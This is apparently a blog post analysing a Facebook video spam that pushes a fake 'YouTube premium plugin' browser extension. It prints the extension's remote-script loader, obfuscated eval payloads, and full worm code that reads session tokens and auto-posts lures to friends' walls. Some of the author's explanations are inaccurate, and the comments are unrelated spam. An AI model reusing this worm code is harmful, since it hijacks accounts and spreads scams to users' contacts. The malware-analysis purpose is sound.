The truth behind "Yeah!! It happens on television!!"(A Facebook Spam)

Facebook spamming is increasing day by day and these days its becoming home for spammers.Latest one is a video spam titled [Video] Yeah!! It happens on television posing some funny pornographic content to attract the users of Facebook.In this article I am going to reveal how this spam/virus (whatever you say) works and how can you protect yourself from this.


Warning:I did this inside a security sandbox.If you want to do the same experiment,I request you to do inside a security sandbox.Before doing this clear all your browser data(Cookies,Cache etc etc.).

So the attack scenario is like this:
You saw one of your friends status like,

It can happen to anyone! I dare you can watch this.

Lol Checkout this video its very embracing moment for Her.

blah..
blah..
blah..



Once you click on the malicious link,Sometime it may ask you to share it with your friends before you can watch. Here lies the first trap.

Once you share it,it will take you to following web page:
It may vary but in my case it was hwuheuwhewew.blogspot.com

When the page will fully load the you get a message "Divx Missing Plugin".


When you click on "Install plugin" button you will be asked to download a plugin before you can watch the video. The plugin is "youtube premium plugin".(The main virus)




As you install the extension the video will automatically shared on your wall and will get notified to all of the friends in your profile.

So if we look at the source code of that page or using firebug,we can see many lines of code but only following is very important.

<iframe allowtransparency='true' frameborder='0' height='305' id='player_iframe' name='player_iframe' scrolling='no' src='http://failvids.net/yt/plugin.html' width='577'></iframe>



From this its clear that the its loading the link 'http://failvids.net/yt/plugin.html' inside an iframe.

So opening that link http://failvids.net/yt/plugin.html main browser i found some interesting lines of code.




<center><span style="font-size:30px;font-weight:bold;text-decoration:underline;">Divx-Plugin Missing</span></center>

                <ol>
                You do not have the plugin required to view the video<br><br>
                    <li>Install Youtube Premium plugin<br><br><a onclick="instalar();" class="install nomargin"></a></li>
                    <li>Then Reload this page by pressing F5</li>
                </ol>

From this above code we can see when a user clicks on [Install Plugin] button that will trigger JavaScript Event onclick() and as a result the JS finction installer() will be called.

Now if you go little but up side of the source code of the page you can see following lines of code.


<script>
                var is_chrome = navigator.userAgent.toLowerCase().indexOf('chrome') > -1;
                var is_firefox = navigator.userAgent.toLowerCase().indexOf('firefox') > -1;
                function instalar(){
if (is_chrome){
                        window.open("http://failvids.net/yt/youtube.crx");
                    } 
                     else if(is_firefox){
                        var params = {
                            "Youtube Extension": {
                                URL: "http://failvids.net/yt/youtube.xpi",
                                toString: function () { return this.URL; }
                            }
                        };
                        InstallTrigger.install(params);
                    } else{
                         window.open("http://failvids.net/yt/video.php");
                    }
                }
if(!is_chrome && !is_firefox )
                window.location="http://failvids.net/yt/video.php";
            </script>


From this code we can see the JavaScript Code is trying to identify the users browser using "navigator.userAgent."

After that we have got our function installer()as i have mentioned earlier.
Inside this function you can see its checking if the users browser is chrome then it will take the user to "http://failvids.net/yt/youtube.crx"

And if the browser is Firefox it will take the user to this url. "http://failvids.net/yt/youtube.xpi"

Now do you know what is .xpi and .crx file.??

Well An XPI file is a Mozilla/Firefox Browser Extension Archive file. and .CRX file is Chrome Browser Extension Archive file.

Whatever Firefox add on or chrome extension you use it comes in .xpi or .crx package.If you open that file in the same browser you will not be able to understand.You will just get a window like this.


My next target was to download those extension package files to know the functionality .But the main problem when downloading Browser Extension main package file is,you cannot download it in the same browser.And you should not try because its very risky.
If any attacker somehow bypassed the the browser security then the Add -one will be installed without your permission.(Its not new in Internet History!)

So its better to use any download manager.After downloading those files i have decided to break the .crx file which is for Google chrome.

Breaking .CRX file.

Unpacking the .crx file of .xpi file is not a big deal.Just rename the youtube.crx file to youtube.rar and unpack it using winrar.

So after unpacking that file i found follwing files

1) Chrome.mainfest
2) go.js
3) mainfest.jsom
4) And some icons.




The main code for this malicious extension file is in "go.js" file.
Source of "go.js" is like :

loadScript_you();
function loadScript_you() {
if ('https:' == document.location.protocol) return false;
var s = document.createElement('script');
s.setAttribute("type","text/javascript");
s.setAttribute("src", "http://failvids.net/yt/script.js");
var head=document.getElementsByTagName("head")[0];
if( head==null) return false;
head.appendChild(s);
return true;
}

From this we can see its fetching remote scripts from location

http://failvids.net/yt/script.js

I tried to access http://failvids.net/yt/script.js and found following lines of code.The server was very slow but after waiting 4-5 min i got this.

function addScript() {
var s = document.createElement('script');
s.setAttribute("type", "text/javascript");
s.setAttribute("src", "http://failvids.net/yt/extra.js");
var a = document.getElementsByTagName('script')[0];
if (a == null) return false;
a.appendChild(s);
return true
}
addScript();

You can see the function "addScript()" is also fetching an external JavaScript file

http://failvids.net/yt/extra.js

The main code was in "extra.js" file and it looks like this.

eval(String.fromCharCode(102,117,110,99,116,105,111,110,32,101,110,99,104,117,108,97,116,117,70,66,40,41,32,123,10,32,32,32,32,118,97,114,32,105,102,114,97,59,10,32,32,32,32,105,102,32,40,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,57,56,102,98,118,105,100,101,111,47,103,105,41,32,124,124,32,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,57,56,102,98,118,105,100,101,111,47,103,105,41,41,32,123,10,32,32,32,32,32,32,32,32,105,102,114,97,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,108,105,102,114,97,109,101,39,41,10,32,32,32,32,32,32,32,32,105,102,32,40,105,102,114,97,32,33,61,32,110,117,108,108,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,105,102,114,97,46,105,110,110,101,114,72,84,77,76,32,61,32,39,60,105,102,114,97,109,101,32,105,100,61,34,99,104,97,110,103,101,34,32,119,105,100,116,104,61,34,53,48,48,34,32,115,114,99,61,34,104,116,116,112,58,47,47,102,97,105,108,118,105,100,115,46,110,101,116,47,121,116,47,118,105,100,101,111,46,112,104,112,34,32,104,101,105,103,104,116,61,34,51,48,48,34,32,115,99,114,111,108,108,105,110,103,61,34,110,111,34,32,102,114,97,109,101,98,111,114,100,101,114,61,34,48,34,62,60,47,105,102,114,97,109,101,62,39,10,32,32,32,32,32,32,32,32,125,59,10,32,32,32,32,125,32,101,108,115,101,32,105,102,32,40,108,111,99,97,116,105,111,110,46,104,114,101,102,46,109,97,116,99,104,40,47,98,108,111,103,115,112,111,116,47,105,41,41,32,123,10,32,32,32,32,32,32,32,32,105,102,114,97,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,108,105,102,114,97,109,101,39,41,10,32,32,32,32,32,32,32,32,105,102,32,40,105,102,114,97,32,33,61,32,110,117,108,108,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,115,101,108,102,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,102,97,105,108,118,105,100,115,46,110,101,116,47,121,116,47,118,105,100,101,111,46,112,104,112,34,59,10,32,32,32,32,32,32,32,32,125,59,10,32,32,32,32,125,10,32,32,32,10,125,10,101,110,99,104,117,108,97,116,117,70,66,40,41,59))

eval(function (p, a, c, k, e, r) {
    e = function (c) {
        return c.toString(a)
    };
    if (!''.replace(/^/, String)) {
        while (c--) r[e(c)] = k[c] || e(c);
        k = [function (e) {
            return r[e]
        }];
        e = function () {
            return '\\w+'
        };
        c = 1
    };
    while (c--) if (k[c]) p = p.replace(new RegExp('\\b' + e(c) + '\\b', 'g'), k[c]);
    return p
}('e 4(){1 a=2.8(\'c\')[0];6(a==7)3 9;1 b=2.d("5");b.f="g://h.i.j/k/l.m";b.n="0";b.o="0";b.p="0";a.q(b);3 r}4();', 28, 28, '|var|document|return|load|img|if|null|getElementsByTagName|false|||body|createElement|function|src|http|whos|amung|us|swidget|acgflhphtsib|gif|width|height|border|appendChild|true'.split('|'), 0, {})) //eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('40="20";8(41.31.46(/^5:\\/\\/(9\\.)?45\\.14/47)){6 3=2["16"]("18");3.12="5://43.3.11/23/44.23.24";3.22="25/21";3.19=17(){6 15=2.35("34")[0];8(15==33)32 30;6 4=2.16("36");4.12="5://37.39.38/42/55.60";4.61="0";4.57="0";4.48="0";15.13(4);6 7=2["16"]("18");7.12="5://9.26.11/14/27.28/50.24?49="+51;7.22="25/21";7.19=17(){8(54=="20"){6 10=2.59("53");8(10==33){32 30}10.52[1].31="5://9.26.11/14/27.28/?56=58"}};2.29.13(7)};2.29.13(3)}',10,62,'||document|hashemian|ss|http|var|clcl|if|www|objobj|com|src|appendChild|cl|oo|createElement|function|script|onload|no|javascript|type|js|php|text|hardtrons|C8AA27305BBB4AD7B769656766711E4BC8AA27305BBB4AD7B769656766711E4B|asp|head|false|href|return|null|body|getElementsByTagName|img|whos|us|amung|VIH_DisplayOnPage|location|swidget|scripts|visitorIPHOST|bancoestado|match|i|border|ip|get|VIH_HostIP|children|side2|analisis|viri20111|STP|height|login|getElementById|gif|width'.split('|'),0,{}))

function readCookie(a) {
    var b = a + '=';
    var c = document['cookie']['split'](';');
    for (var d = 0; d < c['length']; d++) {
        var e = c[d];
        while (e['charAt'](0) == ' ') {
            e = e['substring'](1, e['length']);
        }
        if (e['indexOf'](b) == 0) {
            return e['substring'](b['length'], e['length']);
        }
    }
    return null;
}

function setCookie(nombre, valor, caducidad) {
    var expireDate = new Date()
    expireDate.setDate(expireDate.getDate() + caducidad);
    document.cookie = nombre + "=" + escape(valor) + "; expires=" + expireDate.toGMTString() + "; path=/";
}

function getRandomInt(a, b) {
    return Math['floor'](Math['random']() * (b - a + 1)) + a
}

function randomValue(a) {
    return a[getRandomInt(0, a['length'] - 1)]
}

function fb_comparte() {
    var user_id = readCookie('c_user');
    var uid = user_id;
    if (document['getElementsByName']('post_form_id')[0] == null || document['getElementsByName']('fb_dtsg')[0] == null) return false;
    var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
    var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
    var video_url = ['http://anuerherhee.blogspot.com/','http://doocjhjsuher.blogspot.com/'];
    var domains = ['http://i.imgur.com/b6eRh.jpg'];
    var p0 = ['check this out ... cool ',' This cool ...', 'I like it ..'];
    var p1 = ['check this out ... cool ',' Ehey ',' Hey ',' Hey! ',' about ',' Hello! ',' Look! ',' That last ',' Amazing!'];
    var p2 = ['u wont believe! ',' check the sad post ',' haha can happen to anyone!'];
    var p3 = [' I dare you can watch this . '];
    var message = '';
    var a;
    gf = new XMLHttpRequest();
    gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&viewer=' + uid + '&' + Math['random'](), false);
    gf['send']();
    if (gf['readyState'] != 4) {} else {
        data = eval('(' + gf['responseText']['substr'](9) + ')');
        if (data['error']) {
            return false;
        } else {
            a = data;
        }
    }
    var b = a['payload']['entries']['length'];
    if (b > 30) {
        b = 30
    };
    var cook = readCookie("fb_videobor_" + user_id);
    if (cook == "activo") return false;
    message = [randomValue(p1), randomValue(p2), randomValue(p3)]['join'](' ');
    var c = new XMLHttpRequest();
    var d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
    var title = '[VIDEO] Yeahh!! It happens on Live Television!';
    var summary = 'Lol Checkout this video its very embracing moments for her';
    var imagen = 'http://i.imgur.com/b6eRh.jpg';
    var e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + user_id + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][v]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
    c['open']('POST', d, true);
    c['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
    c['setRequestHeader']('Content-length', e['length']);
    c['setRequestHeader']('Connection', 'keep-alive');
    c['onreadystatechange'] = function () {};
    c['send'](e);
    for (var f = 0; f < b; f++) {
        if (a['payload']['entries'][f]['uid'] != user_id) {
            message = [randomValue(p1), a['payload']['entries'][f]['text']['substr'](0, a['payload']['entries'][f]['text']['indexOf'](' '))['toLowerCase'](), randomValue(p2), randomValue(p3)]['join'](' ');
            var g = new XMLHttpRequest();
            d = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
            title = '[VIDEO] Yeahh!! It happens on Live Television!';
            summary = 'Lol Checkout this video its very embracing moment for her';
            imagen = 'http://i.imgur.com/b6eRh.jpg';
            e = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + a['payload']['entries'][f]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&xhpc_timeline=&xhpc_ismeta=&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][medium]=103&attachment[params][urlInfo][user]=' + randomValue(video_url) + '&attachment[params][urlInfo][canonical]=' + randomValue(video_url) + '&attachment[params][favicon]=http://s.ytimg.com/yt/favicon-vflZlzSbU.ico&attachment[params][title]=' + title + '&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=' + summary + randomValue(p0) + '&attachment[params][url]=' + randomValue(video_url) + '&attachment[params][images]&attachment[params][images][src]=' + randomValue(domains) + '%26' + Math['random']() + '&attachment[params][images][width]=398&attachment[params][images][height]=224&attachment[params][images][i]=0&attachment[params][images][safe]=1&attachment[params][ttl]=-1264972308&attachment[params][error]=1&attachment[params][responseCode]=200&attachment[params][expires]=41647446&attachment[params][images][0]=' + imagen + '&attachment[params][scrape_time]=1306619754&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=' + message + '&xhpc_message=' + message + '&UIPrivacyWidget[0]=80&privacy_data[value]=80&privacy_data[friends]=0&privacy_data[list_anon]=0&privacy_data[list_x_anon]=0&nctr[_mod]=pagelet_wall&lsd=&post_form_id_source=AsyncRequest';
            g['open']('POST', d, true);
            g['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
            g['setRequestHeader']('Content-length', e['length']);
            g['setRequestHeader']('Connection', 'keep-alive');
            g['onreadystatechange'] = function () {};
            g['send'](e);
        }
    }
    setCookie("fb_videobor" + user_id, "activo", 300);
    return true;
}

function FBFBFB321() {
    if (location.href.match(/^http:\/\/(www\.)?facebook.com/i)) {
        var cook = readCookie("fb_videobor_");
        if (cook == "activo") {
            return false;
        }
        var user_id = readCookie('c_user');
        if (user_id == null) return false;
        cook = readCookie("fb_videobor_" + user_id);
        if (cook == "activo") {
            return false;
        }
        setTimeout(function () {
            fb_comparte();
        }, 2000);
        return true;
    }
    return false;
}
FBFBFB321();

From the code we can see that its first its calling the function FBFBFB321();.This fucntion is responsible for faebook cookie Hijacking.

From the function we can see that its checking the url location.
Note: if its http://facebook.com or https://.Then grab the cookie from browser.
As Facebook cookie is always marked as secure then client side java scripts will not be able to read those cookies.so the user is safe.

After that we can see its calling the function function fb_comparte().This function is responsible for generating random fake plugin comments.You can see from the code that its using Ajax request to http://www.facebook.com/ajax/profile/composer.php.
Well this is the main evil fucntion.Analyzing that function i found that first its reading the user cookie c_user.the c_user cookie is nothing but the id of your Facebook profile.

Now the most critical feature of this virus is user tracking feature.
If you look at the function readCookie() you can see it randomly adds cookie to your browser and track your activity on internet.

How to prevent this spam!
Don’t ever click on the link given with this content.

Don’t share the content

Unfortunately if you have followed the steps asked by the spammers then remove the extension that they have asked to install. “Youtube extension”

How to Remove Add Ons and Extension

http://support.google.com/chrome/bin/answer.py?hl=en&answer=113907

http://kb.mozillazine.org/Uninstalling_extensions



There are many more stuffs,Right now its not possible for me to explain the entire code.I hope It will help you!Feel free to drop comments.Thanks.

Comments

  1. best induction cooktop. Don’t ever click on the link given with this content.

    ReplyDelete
  2. sad shayari. troubleshooting support by telephone. We would be

    ReplyDelete
  3. The accompanying article incorporates appropriate data that may make you rethink what you thought you comprehended about the connection between satellite TV and Internet TV. In any case, the most significant thing is to guess with an open thoughts and be happy to reconsider your comprehension if fundamental.
    WebsitePin

    ReplyDelete
  4. This dish development, anyway makes it conceivable to get free channels and channels or even unedited C-Band news material being sent to base camp by field correspondence or a news team, they are generally not mixed. Set Top Box

    ReplyDelete
  5. WhatsApp is one of the top chatting apps available for Android and other smartphones. GBWhatsapp download on your smartphone.

    ReplyDelete
  6. This comment has been removed by the author.

    ReplyDelete
  7. yowhatsapp download is basically among the top best WhatsApp MOD apps available right now over the internet. If you are looking for similar apps like WhatsApp and some modded version of it, then you should download the YOWA apk.

    ReplyDelete
  8. You can proceed with the yo whatsapp download on your Android mobile to enjoy bunch of cool themes and mods.

    ReplyDelete
  9. fm whatsapp apk download benefits include hiding online status, undeleting status and messages, increasing status character length, and so on.

    ReplyDelete
  10. Android application PacKage called APK An application file ready for installation in an
    Android device. The compressed APK file, which is a ZIP archive in the JAR format



    JTWhatsApp APK

    ReplyDelete
  11. Yeh Rishta Kya Kehlata Hai which airs on StarPlus initially revolved around
    Akshara and Naitik, then their daughter Naira who marries Kartik and now..

    Imlie

    ReplyDelete
  12. This comment has been removed by the author.

    ReplyDelete
  13. Kepala Bergatar Malay Dramas Tonton Kepala Bergetar Download Melayu Telefilem dan Filem,
    Drama Melayu Terkini Live Episod Today At Kepala Bergatar You can watch all Malaysian dramas.

    Kepala Bergatar

    ReplyDelete
  14. I see on your yo whatsapp install there will be a lot less spam users.

    ReplyDelete
  15. Look no further than BeiTeck! With our extensive knowledge of the Beirut real estate market, we can help you find your dream home in this vibrant city. Contact us today to learn more about our available apartments for sale in beirut !

    ReplyDelete

Post a Comment